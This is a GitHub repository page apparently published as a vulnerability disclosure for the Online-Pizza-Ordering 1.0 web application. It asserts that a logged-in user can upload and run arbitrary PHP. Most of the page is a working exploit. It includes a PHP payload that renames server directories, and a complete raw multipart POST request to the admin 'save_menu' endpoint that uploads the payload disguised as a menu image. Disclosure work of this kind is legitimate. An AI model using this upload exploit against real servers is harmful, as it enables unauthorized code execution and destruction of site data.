Skip to content
main
Switch branches/tags

Name already in use

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
CVE-nu11secur1ty/vendors/oretnom23/2023/Online-Pizza-Ordering-1.0/
CVE-nu11secur1ty/vendors/oretnom23/2023/Online-Pizza-Ordering-1.0/

Latest commit

 

Git stats

Files

Permalink
Failed to load latest commit information.
Type
Name
Latest commit message
Commit time
 
 
 
 
 
 

Online-Pizza-Ordering-1.0

Vendor

Description:

The malicious user can request an account from the administrator of this system. Then he can use this vulnerability to destroy or get access to all accounts of this system, even more, worst than ever. The malicious user can upload a very dangerous file on this server, and he can execute it via shell. The status is CRITICAL.

STATUS: HIGH Vulnerability

[+]Exploit:

<?php 
// by nu11secur1ty - 2023
// Old Name Of The file
$old_name = "C:/xampp7/htdocs/pwnedhost17/php-opos17" ; 
  
// New Name For The File
$new_name = "C:/xampp7/htdocs/pwnedhost17/php-opos" ; 
  
// using rename() function to rename the file
rename( $old_name, $new_name) ;
  
?>

[+]Injection_REQUEST:

POST /php-opos/admin/ajax.php?action=save_menu HTTP/1.1
Host: pwnedhost7.com
Content-Length: 1050
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5563.111 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryt8ceBsdqMkRKDoHX
Origin: http://pwnedhost7.com
Referer: http://pwnedhost7.com/php-opos/admin/index.php?page=menu
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=sn639s6euv91mfc9rbef4tdr1p
Connection: close

------WebKitFormBoundaryt8ceBsdqMkRKDoHX
Content-Disposition: form-data; name="id"


------WebKitFormBoundaryt8ceBsdqMkRKDoHX
Content-Disposition: form-data; name="name"


------WebKitFormBoundaryt8ceBsdqMkRKDoHX
Content-Disposition: form-data; name="description"


------WebKitFormBoundaryt8ceBsdqMkRKDoHX
Content-Disposition: form-data; name="status"

on
------WebKitFormBoundaryt8ceBsdqMkRKDoHX
Content-Disposition: form-data; name="category_id"

4
------WebKitFormBoundaryt8ceBsdqMkRKDoHX
Content-Disposition: form-data; name="price"


------WebKitFormBoundaryt8ceBsdqMkRKDoHX
Content-Disposition: form-data; name="img"; filename="namebasterd.php"
Content-Type: application/octet-stream

<?php 
// by nu11secur1ty - 2023
// Old Name Of The file
$old_name = "C:/xampp7/htdocs/pwnedhost17/php-opos17" ; 
  
// New Name For The File
$new_name = "C:/xampp7/htdocs/pwnedhost17/php-opos" ; 
  
// using rename() function to rename the file
rename( $old_name, $new_name) ;
  
?>

------WebKitFormBoundaryt8ceBsdqMkRKDoHX--

Reproduce:

href

Proof and Exploit:

href

Time spend:

00:45:00